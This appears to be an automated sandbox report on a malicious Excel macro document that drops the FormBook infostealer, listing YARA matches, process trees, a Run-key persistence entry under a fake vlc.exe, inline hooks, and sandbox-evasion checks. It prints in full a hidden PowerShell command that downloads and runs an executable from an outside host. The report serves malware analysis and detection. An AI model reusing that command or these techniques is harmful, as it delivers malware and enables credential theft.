          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: oftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deX
          Source: oftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deocS
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000014.00000002.438220332.000001D20BD39000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000014.00000002.441451154.000001D21A613000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: oftmhayq.exe, 00000018.00000002.467569207.0000000000EBB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
          Source: Screenshot number: 12 | Screenshot OCR: Enable Content : lj, 5 6 7 " _ _ _="1 - 8 9 10 . . 11 " 12 Microsoft Excel X 13 14 ! Wa
          Powershell drops PE file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\oftmhayq.exe
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F1FF1
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013FDFCE
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01346E30
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013ED616
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F2EF7
          Source: 5901777.xls | OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
          Source: 5901777.xls | OLE indicator, VBA macros: true
          Source: C:\Users\Public\oftmhayq.exe | Code function: String function: 0041BBE0 appears 38 times
          Source: C:\Users\Public\oftmhayq.exe | Code function: String function: 0132D08C appears 48 times
          Source: C:\Users\Public\oftmhayq.exe | Code function: String function: 012DB150 appears 159 times
          Source: C:\Users\Public\oftmhayq.exe | Code function: String function: 01365720 appears 85 times
          Source: C:\Users\Public\oftmhayq.exe | Code function: String function: 0132B150 appears 133 times
          Source: oftmhayq.exe.20.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vlc.exe.25.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 5901777.xls, type: SAMPLE | Matched rule: PowerShell_in_Word_Doc (date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905)
          Each of the memory dumps and unpacked PEs listed below matched both of the following rules:
            Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
          Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
          Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
          Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
          Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: oftmhayq.exe.20.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vlc.exe.25.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine | Classification label: mal100.troj.evad.winXLS@16/12@2/1
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_01
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{3E27D0C2-EB48-412A-8CE4-AD42CAD017F3} - OProcSessId.dat
          Source: 5901777.xls | OLE indicator, Workbook stream: true
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Users\Public\oftmhayq.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: 5901777.xls | Virustotal: Detection: 23%
          Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
          Source: unknown | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
          Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
          Source: unknown | Process created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
          Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
          Source: C:\Users\Public\oftmhayq.exe | Process created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
          Source: C:\Users\Public\oftmhayq.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
          Source: Binary string: wntdll.pdbUGP source: oftmhayq.exe, 0000001D.00000002.535167655.00000000013CF000.00000040.00000001.sdmp, oftmhayq.exe, 0000001E.00000002.487705412.000000000141F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: oftmhayq.exe

          Data Obfuscation:

          Suspicious powershell command line found
          Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
          Source: C:\Users\Public\oftmhayq.exe | Code function: 24_2_0730EB90 pushad ; ret
          Source: C:\Users\Public\oftmhayq.exe | Code function: 24_2_0730219F push E9000001h; ret
          Source: C:\Users\Public\oftmhayq.exe | Code function: 25_2_07BE219F push E9000001h; ret
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_004178AD push 00000001h; retf
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_004172D7 push edi; retf
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_00419D5A push ebp; iretd
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0040D695 push esp; ret
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0041CEB5 push eax; ret
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0041CF6C push eax; ret
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0041CF02 push eax; ret
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0041CF0B push eax; ret
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0132D0D1 push ecx; ret
          Source: C:\Users\Public\oftmhayq.exe | Code function: 30_2_004178AD push 00000001h; retf
          Source: C:\Users\Public\oftmhayq.exe | Code function: 30_2_004172D7 push edi; retf
          Source: C:\Users\Public\oftmhayq.exe | Code function: 30_2_00419D5A push ebp; iretd
          Source: C:\Users\Public\oftmhayq.exe | Code function: 30_2_0040D695 push esp; ret
          Source: C:\Users\Public\oftmhayq.exe | Code function: 30_2_0041CEB5 push eax; ret
          Source: C:\Users\Public\oftmhayq.exe | Code function: 30_2_0041CF6C push eax; ret
          Source: C:\Users\Public\oftmhayq.exe | Code function: 30_2_0041CF02 push eax; ret
          Source: C:\Users\Public\oftmhayq.exe | Code function: 30_2_0041CF0B push eax; ret
          Source: C:\Users\Public\oftmhayq.exe | Code function: 30_2_0137D0D1 push ecx; ret
          Source: initial sample | Static PE information: section name: .text entropy: 7.97600028112

          Persistence and Installation Behavior:

          Creates processes via WMI
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\oftmhayq.exe (dropped file)
          Source: C:\Users\Public\oftmhayq.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe (dropped file)

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\oftmhayq.exe (dropped file)
          Source: C:\Users\Public\oftmhayq.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN
          Source: C:\Users\Public\oftmhayq.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
          Source: C:\Users\Public\oftmhayq.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vlc

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE0
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Process information set: NOOPENFILEERRORBOX
          Source: 5901777.xls Stream path 'Workbook' entropy: 7.92744162749 (max. 8.0)

          Malware Analysis System Evasion:

          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: oftmhayq.exe, 00000018.00000002.468670038.0000000002BC9000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.467738260.0000000003439000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\oftmhayq.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\oftmhayq.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00409A90 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\oftmhayq.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\oftmhayq.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3864
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3310
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5124
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3318
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744Thread sleep count: 3864 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5388Thread sleep count: 3310 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6120Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1304Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5860Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5832Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6124Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5584Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4244Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\conhost.exe TID: 5308Thread sleep count: 39 > 30
